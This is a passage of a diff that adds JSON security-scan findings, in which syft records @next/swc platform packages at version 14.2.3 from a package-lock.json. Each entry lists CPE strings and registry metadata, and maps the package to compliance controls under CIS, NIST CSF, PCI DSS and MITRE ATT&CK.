"cpe:2.3:a:\\@next\\/swc_linux_arm64:\\@next\\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_linux_arm64:\\@next\\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-linux:\\@next\\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-linux:\\@next\\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_linux:\\@next\\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_linux:\\@next\\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40next/swc-linux-arm64-musl@14.2.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@next/swc-linux-arm64-musl/-/swc-linux-arm64-musl-14.2.3.tgz", + "integrity": "sha512-0D4/oMM2Y9Ta3nGuCcQN8jjJjmDPYpHX9OJzqk42NZGJocU2MqhBq5tWkJrUQOQY9N+In9xOdymzapM09GeiZw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "6ebdba72ca21b201", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @next/swc-linux-x64-gnu 14.2.3", + "title": "@next/swc-linux-x64-gnu 14.2.3", + "description": "Package discovered: @next/swc-linux-x64-gnu 14.2.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "1a0b07449dd69139", + "name": "@next/swc-linux-x64-gnu", + "version": "14.2.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@next\\/swc-linux-x64-gnu:\\@next\\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-linux-x64-gnu:\\@next\\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_linux_x64_gnu:\\@next\\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_linux_x64_gnu:\\@next\\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-linux-x64:\\@next\\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-linux-x64:\\@next\\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_linux_x64:\\@next\\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_linux_x64:\\@next\\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-linux:\\@next\\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-linux:\\@next\\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_linux:\\@next\\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_linux:\\@next\\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40next/swc-linux-x64-gnu@14.2.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@next/swc-linux-x64-gnu/-/swc-linux-x64-gnu-14.2.3.tgz", + "integrity": "sha512-ENPiNnBNDInBLyUU5ii8PMQh+4XLr4pG51tOp6aJ9xqFQ2iRI6IH0Ds2yJkAzNV1CfyagcyzPfROMViS2wOZ9w==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "dc907ac1b205061b", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @next/swc-linux-x64-musl 14.2.3", + "title": "@next/swc-linux-x64-musl 14.2.3", + "description": "Package discovered: @next/swc-linux-x64-musl 14.2.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "2ac68dfe221aa840", + "name": "@next/swc-linux-x64-musl", + "version": "14.2.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@next\\/swc-linux-x64-musl:\\@next\\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-linux-x64-musl:\\@next\\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_linux_x64_musl:\\@next\\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_linux_x64_musl:\\@next\\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-linux-x64:\\@next\\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-linux-x64:\\@next\\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_linux_x64:\\@next\\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_linux_x64:\\@next\\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-linux:\\@next\\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-linux:\\@next\\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_linux:\\@next\\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_linux:\\@next\\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40next/swc-linux-x64-musl@14.2.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@next/swc-linux-x64-musl/-/swc-linux-x64-musl-14.2.3.tgz", + "integrity": "sha512-BTAbq0LnCbF5MtoM7I/9UeUu/8ZBY0i8SFjUMCbPDOLv+un67e2JgyN4pmgfXBwy/I+RHu8q+k+MCkDN6P9ViQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "1f0b6c5423b99cbb", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @next/swc-win32-arm64-msvc 14.2.3", + "title": "@next/swc-win32-arm64-msvc 14.2.3", + "description": "Package discovered: @next/swc-win32-arm64-msvc 14.2.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "f14dd9ed0ebaa5a4", + "name": "@next/swc-win32-arm64-msvc", + "version": "14.2.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@next\\/swc-win32-arm64-msvc:\\@next\\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-win32-arm64-msvc:\\@next\\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_win32_arm64_msvc:\\@next\\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_win32_arm64_msvc:\\@next\\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-win32-arm64:\\@next\\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-win32-arm64:\\@next\\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_win32_arm64:\\@next\\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_win32_arm64:\\@next\\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-win32:\\@next\\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-win32:\\@next\\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_win32:\\@next\\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_win32:\\@next\\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40next/swc-win32-arm64-msvc@14.2.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@next/swc-win32-arm64-msvc/-/swc-win32-arm64-msvc-14.2.3.tgz", + "integrity": "sha512-AEHIw/dhAMLNFJFJIJIyOFDzrzI5bAjI9J26gbO5xhAKHYTZ9Or04BesFPXiAYXDNdrwTP2dQceYA4dL1geu8A==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "de3c183aece29806", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @next/swc-win32-ia32-msvc 14.2.3", + "title": "@next/swc-win32-ia32-msvc 14.2.3", + "description": "Package discovered: @next/swc-win32-ia32-msvc 14.2.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "0272e47fa12e3e5d", + "name": "@next/swc-win32-ia32-msvc", + "version": "14.2.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@next\\/swc-win32-ia32-msvc:\\@next\\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-win32-ia32-msvc:\\@next\\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_win32_ia32_msvc:\\@next\\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_win32_ia32_msvc:\\@next\\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-win32-ia32:\\@next\\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-win32-ia32:\\@next\\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_win32_ia32:\\@next\\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_win32_ia32:\\@next\\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-win32:\\@next\\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-win32:\\@next\\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_win32:\\@next\\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_win32:\\@next\\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40next/swc-win32-ia32-msvc@14.2.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@next/swc-win32-ia32-msvc/-/swc-win32-ia32-msvc-14.2.3.tgz", + "integrity": "sha512-vga40n1q6aYb0CLrM+eEmisfKCR45ixQYXuBXxOOmmoV8sYST9k7E3US32FsY+CkkF7NtzdcebiFT4CHuMSyZw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "42051f1b01ab97d3", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @next/swc-win32-x64-msvc 14.2.3", + "title": "@next/swc-win32-x64-msvc 14.2.3", + "description": "Package discovered: @next/swc-win32-x64-msvc 14.2.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "3812cfa26422b0fa", + "name": "@next/swc-win32-x64-msvc", + "version": "14.2.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@next\\/swc-win32-x64-msvc:\\@next\\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-win32-x64-msvc:\\@next\\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_win32_x64_msvc:\\@next\\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_win32_x64_msvc:\\@next\\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-win32-x64:\\@next\\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-win32-x64:\\@next\\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_win32_x64:\\@next\\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_win32_x64:\\@next\\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-win32:\\@next\\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-win32:\\@next\\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_win32:\\@next\\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_win32:\\@next\\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40next/swc-win32-x64-msvc@14.2.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@next/swc-win32-x64-msvc/-/swc-win32-x64-msvc-14.2.3.tgz", + "integrity": "sha512-Q1/zm43RWynxrO7lW4ehciQVj+5ePBhOK+/K2P7pLFX3JaJ/IZVC69SHidrmZSOkqz7ECIOhhy7XhAFG4JYyHA==", + "dependencies": null + } + }, + 